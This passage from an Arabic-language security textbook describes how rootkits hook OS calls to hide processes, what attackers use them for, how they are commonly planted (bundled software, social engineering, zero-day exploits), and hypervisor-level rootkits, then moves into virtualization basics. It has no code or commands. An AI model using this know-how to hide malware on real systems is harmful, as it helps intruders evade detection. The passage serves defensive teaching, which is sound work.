‫اﻻﻣﺗﯾﺎزات‪ ،‬وﺗﺳﺟﯾل ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ‪ ،‬وﺗرﻛﯾب ‪ backdoors‬واﻟﻣﮭﺎم اﻟﺷرﯾرة اﻷﺧرى‪ .‬اﻟﻌدﯾد ﻣن ‪ Rootkits‬ﻗﺎدرة ﻋﻠﻰ ﺗﺟﻧب اﻟﻛﺷف‬
‫ﻷﻧﮭﺎ ﺗﻌﻣل ﻋﻠﻰ ﻣﺳﺗوى أدﻧﻰ ﺑﻛﺛﯾر ﻣن ﻧظﺎم اﻟﺗﺷﻐﯾل ﻧﻔﺳﮫ‪ ،‬أي داﺧل اﻟﻧواة‪/‬اﻟﻛﯾرﻧل‪ .‬اﻟﺑراﻣﺞ اﻟﺗﻲ ﺗﺗﻔﺎﻋل ﻣﻊ وظﺎﺋف اﻟﻣﺳﺗﺧدﻣﯾن ﻋﺎدة ﻓﻲ‬
‫ﺗﻛون ﻓﻲ ﻣﺳﺗوى أﻋﻠﻰ ﻣن اﻟﻧظﺎم‪ .‬ﻋﻧدﻣﺎ ﯾﺣﺗﺎج ﻗطﻌﺔ ﻣن اﻟﺑرﻣﺟﯾﺎت ﻣﺛل ﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟﻔﯾروﺳﺎت ﻷداء ﻣﮭﻣﺔ ﻣﻌﯾﻧﺔ‪ ،‬ﻓﺈﻧﮫ ﻏﺎﻟﺑﺎ ﻣﺎ ﺗﻣرر‬
‫طﻠب إﻟﻰ ﻣﺳﺗوﯾﺎت أدﻧﻰ ﻣن ﻧظﺎم اﻟﺗﺷﻐﯾل ﻹﻛﻣﺎل اﻟﻣﮭﻣﺔ‪ .‬أذﻛر أن ﺑﻌض ‪ Rootkits‬ﯾﻌﯾش ﻓﻲ ﻋﻣﻖ ﻧظﺎم اﻟﺗﺷﻐﯾل‪ .‬ﯾﻣﻛن أن ﺗﻌﻣل أﯾﺿﺎ "‬
‫‪ " hooking‬أو اﻋﺗراض ھذه اﻟﻧداءات اﻟﻣﺧﺗﻠﻔﺔ ﺑﯾن اﻟﺑرﻧﺎﻣﺞ وﻧظﺎم اﻟﺗﺷﻐﯾل‪.‬‬
‫ﻣن ﺧﻼل اﺻطﯾﺎد اﻟطﻠب ﻣن ﻗطﻌﺔ ﻣن اﻟﺑرﻣﺟﯾﺎت‪ ،‬ﻓﺎن ‪ Rootkits‬ﻗﺎدر ﻋﻠﻰ ﺗﻌدﯾل اﻻﺳﺗﺟﺎﺑﺔ اﻟطﺑﯾﻌﯾﺔ‪ .‬اﻟﻧظر ﻓﻲ اﻟﻣﺛﺎل اﻟﺗﺎﻟﻲ‪ :‬اﻓﺗرض‬
‫أﻧك ﺗرﯾد أن ﺗرى ﻣﺎ ھﻲ اﻟﻌﻣﻠﯾﺎت اﻟﺗﻲ ﯾﺗم ﺗﺷﻐﯾﻠﮭﺎ ﻋﻠﻰ ﺟﮭﺎز وﯾﻧدوز‪ .‬ﻹﻧﺟﺎز ھذا‪ ،‬ﻓﺈن ﻣﻌظم اﻟﻣﺳﺗﺧدﻣﯾن ﯾﺳﺗﺧدﻣوا ﺗرﻛﯾﺑﺔ اﻟﻣﻔﺎﺗﯾﺢ "‬
‫‪ .“ Ctrl + Alt + Del‬وھذا ﺳوف ﯾﺳﻣﺢ ﻟﻠﻣﺳﺗﺧدﻣﯾن ﻟﺑدء ﻓﻲ إدارة اﻟﻣﮭﺎم وﻋرض اﻟﻌﻣﻠﯾﺎت واﻟﺧدﻣﺎت اﻟﺗﻲ ﺗﻌﻣل‪ .‬ﻣﻌظم اﻟﻧﺎس ﺗﻘوم‬
‫ﺑﺗﻧﻔﯾذ ھذه اﻟﻣﮭﻣﺔ ﻣن دون اﻟﺗﻔﻛﯾر ﻓﯾﮫ‪ .‬ﺣﯾث ﯾﻘوم ﺑﺎﻟﻧظر ﻓﻲ ﻗﺎﺋﻣﺔ ﻋرض اﻟﻌﻣﻠﯾﺔ ﺛم اﻟﻣﺿﻲ ﻗدﻣﺎ‪.‬‬
‫ﻓﻲ ھذه اﻟﺣﺎﻟﺔ‪ ،‬اﻟﺑرﻧﺎﻣﺞ ھو إﺟراء ﻣﻛﺎﻟﻣﺔ إﻟﻰ ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﺳﺄل ﻣﺎ ھﻲ اﻟﻌﻣﻠﯾﺎت أو اﻟﺧدﻣﺎت ﻗﯾد اﻟﺗﺷﻐﯾل‪ .‬ﻧظﺎم اﻟﺗﺷﻐﯾل ﯾﺳﺗﻌﻠم ﻋن ﺟﻣﯾﻊ‬
‫اﻟﺑراﻣﺞ ﻗﯾد اﻟﺗﺷﻐﯾل ﺛم إرﺟﺎع اﻟﻘﺎﺋﻣﺔ‪ .‬وﻣﻊ ذﻟك‪ ،‬إذا أﺿﻔﻧﺎ ‪ Rootkits‬ﻟﮭذا اﻟﻣزﯾﺞ‪ ،‬ﻓﺳوف ﺗﺻﺑﺢ اﻷﻣور أﻛﺛر ﺗﻌﻘﯾدا‪ .‬وذﻟك ﻷن‬
‫‪ Rootkits‬ﻟدﯾﮭﺎ اﻟﻘدرة ﻋﻠﻰ اﻋﺗراض وﺗﻌدﯾل اﻻﺳﺗﺟﺎﺑﺎت ﻋﺎد ﻣن ﻗﺑل ﻧظﺎم اﻟﺗﺷﻐﯾل‪ ،‬ﻋﻧدﻣﺎ ﯾﺣﺎول اﻟﻣﺳﺗﺧدم ﻋرض ﻗﺎﺋﻣﺔ اﻟﻌﻣﻠﯾﺔ‪ ،‬ﯾﻣﻛن ﻟل‬
‫‪ Rootkits‬ﺑﺑﺳﺎطﺔ إزاﻟﺔ ﺑراﻣﺞ ﻣﺧﺗﺎرة‪ ،‬واﻟﺧدﻣﺎت‪ ،‬واﻟﻌﻣﻠﯾﺎت ﻣن اﻟﻘﺎﺋﻣﺔ‪ .‬ھذا ﯾﺣدث ﻋﻠﻰ اﻟﻔور واﻟﻣﺳﺗﺧدم ﻟﯾس ﻋﻠﻰ ﻋﻠم ﺑﺄي اﺧﺗﻼﻓﺎت‪.‬‬
‫اﻟﺑرﻧﺎﻣﺞ ﻧﻔﺳﮫ ھو ﻓﻲ اﻟواﻗﻊ ﯾﻌﻣل ﻋﻠﻰ ﻧﺣو ﻣﺛﺎﻟﻲ‪ .‬ﺣﯾث ﯾﻘدم ﺗﻘﺎرﯾر ﺑﺎﻟﺿﺑط ﻣﺎ ﻗﯾل ﻟﮫ ﻣن ﻗﺑل ﻧظﺎم اﻟﺗﺷﻐﯾل‪ .‬ﻓﻲ ﻛﺛﯾر ﻣن اﻟﻣﻌﺎﻧﻲ‪ ،‬ﻓﺎن‬
‫‪ Rootkits‬ھو اﻟذي ﯾﺟﻌل ﻧظﺎم اﻟﺗﺷﻐﯾل ﯾﻛذب‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪436‬‬

‫ﻣن اﻟﻣﮭم أن ﻧﺷﯾر إﻟﻰ أن ‪ Rootkits‬ﻟﯾﺳت ‪ Rootkits .exploit‬ھو اﻟﺷﻲء اﻟذى ﯾﺗم ﺗﺣﻣﯾﻠﮫ ﻋﻠﻰ اﻟﻧظﺎم ﺑﻌد أن ﯾﺗم ‪ exploit‬اﻟﻧظﺎم‪.‬‬
‫وﻋﺎدة ﻣﺎ ﺗﺳﺗﺧدم ‪ Rootkits‬ﻹﺧﻔﺎء اﻟﻣﻠﻔﺎت أو اﻟﺑراﻣﺞ واﻟﺣﻔﺎظ ﻋﻠﻰ اﻟوﺻول اﻟﻣﺳﺗﺗر اﻟﺧﻔﻲ‪.‬‬
‫‪ Rootkits‬ھﻲ ﺑراﻣﺞ ﺗﮭدف إﻟﻰ اﻟوﺻول إﻟﻰ ﺟﮭﺎز ﻛﻣﺑﯾوﺗر دون أن ﯾﺗم اﻛﺗﺷﺎﻓﮭﺎ‪ .‬ھذه ھﻲ اﻟﺑراﻣﺞ اﻟﺿﺎرة اﻟﺗﻲ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻟﻠوﺻول‬
‫ﻏﯾر اﻟﻣﺻرح ﺑﮫ إﻟﻰ اﻟﻧظﺎم ﻋن ﺑﻌد وﺗﻧﻔﯾذ اﻷﻧﺷطﺔ اﻟﺧﺑﯾﺛﺔ‪ .‬أﯾﺿﺎ ﻣن أھداف ‪ Rootkits‬ھو اﻟﺣﺻول ﻋﻠﻰ اﻣﺗﯾﺎزات اﻟﻣﺳﺗﺧدم‬
‫اﻟﺟذري‪/‬اﻹداري )‪ (root/admin‬إﻟﻰ اﻟﻧظﺎم‪ .‬ﻋن طرﯾﻖ ﺗﺳﺟﯾل اﻟدﺧول ﺑﺎﺳم اﻟﻣﺳﺗﺧدم اﻟﺟذري اﻟﻰ ھذا اﻟﻧظﺎم‪ ،‬ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟﻣﯾن ﺗﻧﻔﯾذ أي‬
‫ﻣﮭﻣﺔ ﻣﺛل ﺗﺛﺑﯾت اﻟﺑراﻣﺞ أو ﺣذف اﻟﻣﻠﻔﺎت‪ ،‬اﻟﺦ‪ .‬ﯾﻌﻣل ﻋن طرﯾﻖ اﺳﺗﻐﻼل ﻧﻘﺎط اﻟﺿﻌف ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل واﻟﺗطﺑﯾﻘﺎت‪ .‬ﺗﺗﺄﻟف ‪Rootkits‬‬
‫اﻟﻧﻣوذﺟﯾﺔ ﻣن ﺑراﻣﺞ ‪ ،backdoor‬وﺑراﻣﺞ ‪ ،DDOS‬ﺣزم ﺗﺟﺳس )‪ ،(Sniffing Packet‬وأدوات ‪ ،IRC bots ،log-wiping‬اﻟﺦ‪.‬‬
‫ﺟﻣﯾﻊ اﻟﻣﻠﻔﺎت ﺗﺣﺗوي ﻋﻠﻰ ﻣﺟﻣوﻋﺔ ﻣن ‪ .attributes‬ھﻧﺎك ﺣﻘول ﻣﺧﺗﻠﻔﺔ ﻓﻲ ﺳﻣﺎت اﻟﻣﻠف)‪ . (file attributes‬ﯾﺳﺗﺧدم اﻟﺣﻘل اﻷول‬
‫ﻟﺗﺣدﯾد ﺗﻧﺳﯾﻖ اﻟﻣﻠف)‪ ، (format of the file‬واﻟﺗﻲ ﻗد ﺗﻛون إﻣﺎ‪ ،archive ،hidden ،‬أو ‪ .read-only‬ﯾﺻف ﺣﻘل آﺧر اﻟﻣرة اﻟﺗﻲ ﺗم‬
‫إﻧﺷﺎء اﻟﻣﻠف ﻓﯾﮭﺎ‪ ،‬اﻟوﻗت اﻟذي ﺗم اﻟوﺻول اﻟﯾﮫ‪ ،‬طول اﻟﻣﻠف‪ .‬اﻟوظﯾﻔﺔ )(‪ GetFileAttributesEx‬و‬
‫)(‪ GetFilelnformationByHandle‬ﺗﺳﻣﺢ ﺑﮭذا‪.‬‬
‫ﯾﺳﺗﺧدم ‪ ATTRIB.exe‬ﻟﻌرض أو ﺗﻐﯾﯾر ﺳﻣﺎت اﻟﻣﻠف)‪ . (file attributes‬ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم إﺧﻔﺎء‪ ،‬أو ﺣﺗﻰ ﺗﻐﯾﯾر ﺳﻣﺎت ﻣﻠﻔﺎت اﻟﺿﺣﯾﺔ‪،‬‬
‫ﻟذﻟك ﯾﻣﻛن اﻟﻣﮭﺎﺟم اﻟوﺻول إﻟﯾﮭﺎ‪.‬‬
‫ﯾﻘوم اﻟﻣﮭﺎﺟم ﺑوﺿﻊ ‪ Rootkits‬ﺑﺎﺳﺗﺧدام اﻟطرق اﻷﺗﯾﺔ‪:‬‬
‫‪ -‬ﻓﺣص أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر اﻟﺿﻌﯾﻔﺔ واﻟﺧوادم ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت‪.‬‬
‫‪ -‬ﺗﻐﻠﯾف ‪ Rootkits‬ﻓﻲ ﻣﺟﻣوﻋﺔ ﺧﺎﺻﺔ ﻣن اﻟﺣزم ﻣﺛل اﻷﻟﻌﺎب‪.‬‬
‫‪ -‬ﺗﺛﺑﯾت ‪ Rootkits‬ﻋﻠﻰ أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر اﻟﻌﺎﻣﺔ أو أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر ﻟﻠﺷرﻛﺎت ﻣن ﺧﻼل اﻟﮭﻧدﺳﺔ اﻻﺟﺗﻣﺎﻋﯾﺔ‪.‬‬
‫‪ -‬إطﻼق ھﺟوم ‪) zero-day‬ﻟﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات‪ ،‬ﺗﺟﺎوز ﺳﻌﺔ اﻟﻣﺧزن اﻟﻣؤﻗت واﺳﺗﻐﻼل ﻧواة وﯾﻧدوز‪ ،‬اﻟﺦ(‪.‬‬
‫‪ -‬طرق اﻟراﺑط واﻟﺑوت ﻣن ‪ ،ICQ ،IRC‬اﻟﺦ‪(Means of a link and a bot from IRC, ICQ, etc) .‬‬
‫اﻟﻐرض اﻷﺳﺎﺳﻲ ﻣن ‪ Rootkits‬ھو اﻟﺳﻣﺎح ﻟﻠﻣﮭﺎﺟﻣﯾن ﺑﺎﻟوﺻول اﻟﻣﺗﻌدد اﻟﻐﯾر ﻣﻧظم واﻟﻐﯾر ﻣﻛﺗﺷف إﻟﻰ اﻟﻧظﺎم‪ .‬ﺣﯾث ﯾﻣﻛﻧﮫ ﺗﺛﺑﯾت ﻋﻣﻠﯾﺔ‬
‫ﻣﺳﺗﺗرة أو اﺳﺗﺑدال واﺣد أو أﻛﺛر ﻣن اﻟﻣﻠﻔﺎت اﻟﺗﻲ ﯾﺗم ﺗﺷﻐﯾﻠﮭﺎ ﻓﻲ ﻋﻣﻠﯾﺎت اﻻﺗﺻﺎل اﻟﻌﺎدي‪.‬‬
‫اﻟﻣﮭﺎﺟﻣﯾن ﯾﺳﺗﺧدﻣوا ‪ Rootkits‬ﻟﻸھداف اﻟﺗﺎﻟﯾﺔ‪:‬‬
‫‪ -‬اﻟوﺻول اﻟﻰ اﻟﻧظﺎم اﻟﻣﺿﯾف ﻛﻣﺳﺗﺧدم ﺟذري واﻟوﺻول اﻟﻣﺳﺗﺗر ﻋن ﺑﻌد‪.‬‬
‫‪ -‬ﻟﺻﻧﻊ ﻗﻧﺎع ﻟﻣﺳﺎرات اﻟﻣﮭﺎﺟم واﻟﺗطﺑﯾﻘﺎت أو اﻟﻌﻣﻠﯾﺎت اﻟﺧﺑﯾﺛﺔ‪.‬‬
‫‪ -‬ﺟﻣﻊ اﻟﺑﯾﺎﻧﺎت اﻟﺣﺳﺎﺳﺔ‪ ،‬وﺣرﻛﺔ ﻣرور اﻟﺑﯾﺎﻧﺎت‪ ،‬وﻣﺎ إﻟﻰ ذﻟك ﻣن اﻟﻧظﺎم اﻟذي ﻗد ﯾﻛون ﺑﺎﻟﻧﺳﺑﺔ ﻟﻠﻣﮭﺎﺟﻣﯾن ﻣﻘﯾدة أو ﻻ ﯾﻣﻠﻛوا‬
‫اﻟوﺻول اﻟﯾﮭﺎ‪.‬‬
‫‪ -‬ﺗﺧزﯾن اﻟﺗطﺑﯾﻘﺎت اﻟﺧﺑﯾﺛﺔ اﻷﺧرى‪ ،‬وﺗﻛون ﺑﻣﺛﺎﺑﺔ ﺧﺎدم ﯾﺣﺗوي ﻋﻠﻰ ﻣوارد ﺗﺳﺗﺧدم ﻟﻠﺣﺻول ﻋﻠﻰ اﻟﺗﺣدﯾﺛﺎت ﺑوت وھﻠم ﺟرا‪.‬‬

‫‪Types of Rootkits‬‬

‫‪ Rootkits‬ھو ﻧوع ﻣن اﻟﺑرﻣﺟﯾﺎت اﻟﺧﺑﯾﺛﺔ اﻟﺗﻲ ﯾﻣﻛن أن ﺗﺧﻔﻲ ﻧﻔﺳﮭﺎ ﻋن ﺗطﺑﯾﻘﺎت ﻧظﺎم اﻟﺗﺷﻐﯾل وﻣﻛﺎﻓﺣﺔ اﻟﻔﯾروﺳﺎت ﻓﻲ اﻟﻛﻣﺑﯾوﺗر‪ .‬ﯾوﻓر‬
‫ھذا اﻟﺑرﻧﺎﻣﺞ ﻟﻠﻣﮭﺎﺟﻣﯾن اﻟوﺻول ﻟﻠﻣﺳﺗوى اﻟﺟذري إﻟﻰ اﻟﻛﻣﺑﯾوﺗر ﻣن ﺧﻼل ‪ .backdoor‬ھذه ‪ Rootkits‬ﺗوظف ﻣﺟﻣوﻋﺔ ﻣن اﻟﺗﻘﻧﯾﺎت‬
‫ﻟﻠﺳﯾطرة ﻋﻠﻰ اﻟﻧظﺎم‪ .‬ﻧوع ‪ Rootkits‬ﯾؤﺛر ﻋﻠﻰ اﺧﺗﯾﺎر ﻣوﺟﮫ اﻟﮭﺟوم‪ .‬أﺳﺎﺳﺎ ھﻧﺎك ﺳﺗﺔ أﻧواع ﻣن ‪ Rootkits‬اﻟﻣﺗﺎﺣﺔ‪ .‬وھم‪:‬‬
‫‪Hypervisor-level Rootkit‬‬

‫ﻣن اﻟﻣﻌروف ﻟﻠﺟﻣﯾﻊ اﻧﺗﺷﺎر ﺗﻛﻧوﻟوﺟﯾﺎ ال ‪ Virtualization‬ﻓﻲ اﻵوﻧﺔ اﻷﺧﯾرة ﻓﻲ ﺻورة ﺑراﻣﺞ ال ‪ Virtual Machine‬اﻟﻣﻧﺗﺷرة واﻟﺗﻲ‬
‫ﺗﻣﻛﻧﺎ ﻣن ﻋﻣل ﺟﮭﺎز وھﻣﻲ ﺑﻧظﺎم ﺗﺷﻐﯾل ﻣﻧﻔﺻل ﻋن اﻟﺟﮭﺎز اﻟرﺋﯾﺳﻲ‪ .‬وﻣن أﺷﮭر ھذه اﻟﺑراﻣﺞ ھو ﺑرﻧﺎﻣﺞ ال‪ VMWare‬وﻏﯾرھﺎ‬
‫وﺗﺳﺗﺧدم طﺑﻌﺎ اﻷﻧظﻣﺔ اﻟوھﻣﯾﺔ ﻓﻲ ﺗﺣﻠﯾل اﻟﻔﯾروﺳﺎت واﻟروت ﻛﯾت وﻓﻲ اﺧﺗﺑﺎر اي ﺷﻲء ﺗرﯾد اﺧﺗﺑﺎره ﺑﻣﻌزل ﻋن ﺟﮭﺎزك وﺗﺳﺗﺧدم أﯾﺿﺎ ﻓﻲ‬
‫ﺑﻧﺎء ﺧوادم ﻣﺗﻌددة اﻷﻧظﻣﺔ‪ Hypervisor-level rootkits .‬ﻋﺎدة ﻣﺎ ﯾﺗم إﻧﺷﺎؤھﺎ ﻣن ﺧﻼل اﺳﺗﻐﻼل ﻣﯾزة اﻷﺟﮭزة‬
‫)‪ (Exploiting hardware feature‬ﻣﺛل ‪ Intel VT‬و‪ Rootkits . AMD-V‬ھذه ﺗﺗﻌﺎﻣل ﻣﻊ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻟﻠﺟﮭﺎز اﻟﻣﺳﺗﮭدف ﻋﻠﻰ أﻧﮫ‬
‫آﻟﺔ اﻓﺗراﺿﯾﺔ )‪ (virtual machine‬واﻟﺗﻲ ﺗﻣﻛﻧﮫ ﻣن اﻋﺗرض ﺟﻣﯾﻊ اﺳﺗدﻋﺎءات اﻷﺟﮭزة اﻟﺗﻲ أدﻟﻰ ﺑﮭﺎ ﻧظﺎم اﻟﺗﺷﻐﯾل اﻟﮭدف‪ .‬ھذا اﻟﻧوع ﻣن‬
‫‪ Rootkits‬ﯾﻌﻣل ﻋن طرﯾﻖ ﺗﻌدﯾل ﺗﺳﻠﺳل ﺗﻣﮭﯾد‪/‬ﺗﺷﻐﯾل اﻟﻧظﺎم )‪ (The system's boot sequence‬ﺛم ﯾﻘوم ﺑﺎﻟﺗﺣﻣﯾل ﺑدﻻ ﻣن ﺷﺎﺷﺔ‬
‫اﻟﺟﮭﺎز اﻟوھﻣﻲ اﻷﺻﻠﻲ )‪.(original virtual machine‬‬
‫وﻟﻠﺗﻌرف أﻛﺛر ﻋﻠﻰ ال ‪ Virtual Rootkits‬او‪ Hypervisor-level rootkits‬ﯾﺟب ان ﻧﺗﻌرف ﻗﻠﯾﻼ ﻋﻠﻰ ﺗﻛﻧوﻟوﺟﯾﺎ ال ‪Virtualization‬‬
‫واﻟﺗﻲ ﺗﻧﻘﺳم اﻟﻲ ﺛﻼث ﻋﻧﺎﺻر رﺋﯾﺳﯾﺔ وھﻲ‪:‬‬
‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬
‫‪437‬‬

‫‪Hypervisor -‬‬
‫‪Virtualization strategies -‬‬
‫‪Virtual memory management -‬‬
‫ﺑﻌد ذﻟك ﺳﻧﺗﻌرف ﻋﻠﻰ اﺳﺎﻟﯾب ال ‪ Virtual Rootkit‬ﻣﺛل‪:‬‬
‫‪-‬‬ ‫‪Escaping from a virtual environment‬‬
‫‪-‬‬ ‫‪Hijacking the hypervisor‬‬
‫‪Virtualization‬‬
‫ﻋﻣﻠﯾﺔ اﻟــ ‪ Virtualization‬ﺑﺎﺧﺗﺻﺎر ھﻲ ﻋﻣﻠﯾﺔ ﺗﻘﺳﯾم ﻣوارد ‪ Resources‬اﻟﺟﮭﺎز اﻟواﺣد ﻋﻠﻰ أﻛﺛر ﻣن ﻧظﺎم ﺗﺷﻐﯾل ‪ OS‬ﺗﻌﻣل ﺳوﯾﺎ ﻓﻲ‬
‫ﻧﻔس اﻟوﻗت‪ .‬وﻗﺑل ﺗﻛﻧوﻟوﺟﯾﺎ ال ‪ Virtualization‬ﻛﺎن ﯾﻌﻣل اﻟﺟﮭﺎز ﺑﻛل ﻣوارده ﻟﺗﺷﻐﯾل ﻧظﺎم ﺗﺷﻐﯾل واﺣد ﻓﻘط ﻣﻣﺎ ﯾﻌﻧﻲ ﺿﯾﺎع ﻣوارد‬
‫ﻛﺛﯾره ﻟﻠﺟﮭﺎز ﺧﺎﺻﺔ ﺑﻌد اﻟطﻔرة اﻟﻛﺑﯾرة اﻟﺗﻲ ﺣدﺛت ﻓﻲ ﻗدرات اﻷﺟﮭزة وﻓﻲ ﺻﻧﺎﻋﺔ اﻟﻣﻌﺎﻟﺟﺎت واﯾﺿﺎ زﯾﺎدة ﺳﻌﺔ اﻟﺗﺧزﯾن‪Memory‬‬
‫وﺗﺳﺗﺧدم ھذه اﻟﺗﻛﻧوﻟوﺟﯾﺎ اﻷن ﻓﻲ اﻟﺳﯾرﻓرات ﺣﯾث ﯾﺳﺗطﯾﻊ ﻣدﯾر اﻟﺳﯾرﻓر ﺗﺷﻐﯾل أﻛﺛر ﻣن ‪ Web Server‬ﻋﻠﻰ ﺟﮭﺎز اﻟواﺣد‪ .‬اﯾﺿﺎ اﻧﺗﻘﻠت‬
‫ھذه اﻟﺗﻛﻧوﻟوﺟﯾﺎ اﻟﻲ اﻷﺟﮭزة اﻟﻌﺎدﯾﺔ ‪ PC‬ﺣﯾث ﯾﺳﺗطﯾﻊ اﻟﻣﺳﺗﺧدم ﺗﺷﻐﯾل أﻛﺛر ﻣن ﻧظﺎم ﺗﺷﻐﯾل ﺳوﯾﺎ ﻣﺛل ﺗﺷﻐﯾل اﻟوﯾﻧدوز ﻣﻊ ال‪. Linux‬‬
‫‪Virtualization of system resources‬‬
‫أﻧواع ال ‪Virtual Machines‬‬
‫‪ -1‬اﻟﻧوع اﻷول ‪ Process Virtual Machine‬اﯾﺿﺎ ﯾﻌرف ﺑــ ‪ Application Virtual Machine‬وھو ﺑﺎﺧﺗﺻﺎر ﻟﺗﺷﻐﯾل‬
‫‪Process‬ﻣﻌﯾﻧﺔ ﻋﻠﻰ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻣﺛل ال ‪ Java Virtual Machine‬وال ‪ Dot NET Framework‬ﻓﮭذه اﻷﺷﯾﺎء اﯾﺿﺎ‬
‫ﺗﻧدرج ﺗﺣت ﻣﺳﻣﻲ اﻷﺟﮭزة اﻟوھﻣﯾﺔ‪. Virtual Machines‬‬
‫‪ -2‬اﻟﻧوع اﻟﺛﺎﻧﻲ ‪ System Virtual Machines‬اﯾﺿﺎ ﯾﻌرف ﺑــ ‪ Hardware virtual machine‬وھذا ﻣﺧﺻص ﻟﻛﻲ ﯾﻌﻣل‬
‫أﻛﺛر ﻣن ﻧظﺎم ﺗﺷﻐﯾل ﺳوﯾﺎ‪.‬‬
‫‪Hypervisor‬‬
‫ھو أﺣد اھم ﻋﻧﺎﺻر ال ‪ Hardware VM‬طﺑﻌﺎ ‪ VM‬اﺧﺗﺻﺎر ﻟــ ‪ Virtual Machine‬وھو اﻟﻣﺳؤول ﻋن ‪Handles System‬‬
‫‪level virtualization‬ﻟﻛل ال ‪ VMs‬اﻟﺗﻲ ﺗﻌﻣل ﻋﻠﻰ اﻟﺟﮭﺎز اﻟرﺋﯾﺳﻲ ‪ Host System‬وھو اﯾﺿﺎ ﯾدﯾر ﻋﻣﻠﯾﺔ ﺗﻘﺳﯾم اﻟﻣوارد واﻟﺗﺷﻐﯾل‬
‫ﺑﯾن ال ‪ Physical‬وال ‪Virtual Hardware‬اﯾﺿﺎ ھو اﻟﻣﺳؤول ﻋن ﻋﻣﻠﯾﺔ ﻋزل ال ‪ VMs‬ﻋن ﺑﻌﺿﮭﺎ وﺗﻘﺳﯾم اﻟﻣوارد ﺑﯾﻧﮭﺎ‪ .‬ﻓﮭو اﻟﻌﻘل‬
‫اﻟﻣﺗﺣﻛم ﻓﻲ ﻋﻣﻠﯾﺔ ال‪virtualization‬‬
‫ﯾوﺟد ﻧوﻋﯾن ﻣن ال‪: Hypervisor‬‬
‫‪ -‬اﻟﻧوع اﻷول ‪ Native‬وھو ﯾﺗم وﺿﻌﺔ ﻓﻲ اﻟﻠوﺣﺔ اﻷم ﻧﻔﺳﮭﺎ ‪ Motherboard‬اي ان ﺗﻛﻧوﻟوﺟﯾﺎ ال ‪ VM‬ﻓﻲ ھذا اﻟﻧوع ﻟﯾﺳت‬
‫ﻣﺟرد ﺑرﻧﺎﻣﺞ ﺑل ھﻲ ﺗدﺧل ﻓﻲ ﺗرﻛﯾب ال ‪ Hardware‬اﯾﺿﺎ‪ .‬وﻣن اﻣﺛﻠﺔ اﻟﻣﻌﺎﻟﺟﺎت اﻟﺗﻲ ﺗدﻋم ﺧﺎﺻﯾﺔ ال ‪Native Hypervisor‬‬
‫ﻣﻌﺎﻟﺟﺎت ‪ AMD-V/Pacifica‬و ‪Intel VT‬و‪.UltraSPARC T1‬‬
‫‪ -‬اﻟﻧوع اﻟﺛﺎﻧﻲ ‪ Hosted‬وھو اﻟﻧوع اﻟﺑرﻣﺟﻲ اﻟذي ﯾﺗم وﺿﻌﺔ ﻣﻊ ﻧظﺎم اﻟﺗﺷﻐﯾل اﻟرﺋﯾﺳﻲ ‪ Host OS‬ﻣﺛل ﺑراﻣﺞ ال ‪VMWare‬‬
‫وال ‪.Oracle Virtual Box‬‬
‫‪Virtualization strategies‬‬
‫ﯾوﺟد ﺛﻼث اﻧواع ﻣن طرق ال ‪ Virtualization‬اﻟﻣﺳﺗﺧدﻣﺔ ﺣﺎﻟﯾﺎ واﻟﺗﻲ ﺗﺧﺗﻠف ﻣن ﻧظﺎم ﺗﺷﻐﯾل اﻟﻲ أﺧر وﻣن ﻋﻧﺎﺻر ال ‪Hardware‬‬
‫اﻟﻣﺳﺗﺧدﻣﺔ‪.‬‬
‫اﻟطرﯾﻘﺔ اﻷوﻟﻲ ھﻲ ‪ virtual machine emulation‬وھو ﯾﺣﺗﺎج اﻟﻲ ‪ hypervisor‬ﯾﻘوم ﺑﻣﺣﺎﻛﺎة اﻷﺟﮭزة ‪ Hardware‬اﻟﺣﻘﯾﻘﯾﺔ‬
‫ﺑﺄﺧرى ﺗﺧﯾﻠﯾﺔ ﯾﺳﺗﺧدﻣﮭﺎ ﻧظﺎم اﻟﺗﺷﻐﯾل اﻟﻣوﺟود ﻋﻠﻰ ال ‪ VM‬واﻟذي ﯾﺳﻣﻲ ‪ guest OS‬ﻓﮭو ﯾوھم ﻧظﺎم اﻟﺗﺷﻐﯾل اﻟﺗﺧﯾﻠﻲ ﺑﺎﻧﺔ ﯾﺗﻌﺎﻣل ﻣﻊ‬
‫‪Hardware‬ﺣﻘﯾﻘﯾﺔ‪ .‬واھم ﺷﻲء ﻓﻲ ھذه اﻟطرﯾﻘﺔ ھو ﺗوﻓﯾر ﻛل اﻟﺻﻼﺣﯾﺎت ﻟﻠﻧظﺎم اﻟوھﻣﻲ ‪ Privilege Level‬ﻣﺛل ﺻﻼﺣﯾﺎت اﺳﺗدﻋﺎء‬
‫‪Privileged CPU instructions‬وھذا ﯾوﻓره ال ‪ hypervisor‬ﻧﻔﺳﮫ‪.‬‬
‫اﻟطرﯾﻘﺔ اﻟﺛﺎﻧﯾﺔ ھﻲ ‪ paravirtualization‬وھﻲ ﻋﻛس اﻟطرﯾﻘﺔ اﻷوﻟﻲ ﺣﯾث ﻻ ﯾﻘوم ال ‪ hypervisor‬ﺑﺗوﻓﯾر ال ‪Privileged CPU‬‬
‫‪instructions‬وﻻ ﯾﻘوم ﺑﻣﺣﺎﻛﺎة ﻟل ‪ Hardware‬ﻓﮭذه اﻟطرﯾﻘﺔ ﯾدرك ﻓﯾﮭﺎ ﻧظﺎم اﻟﺗﺷﻐﯾل اﻟوھﻣﻲ اﻧﮫ ﯾﻌﻣل ﻓﻌﻼ ﻋﻠﻰ ﺟﮭﺎز وھﻣﻲ‪VM‬‬
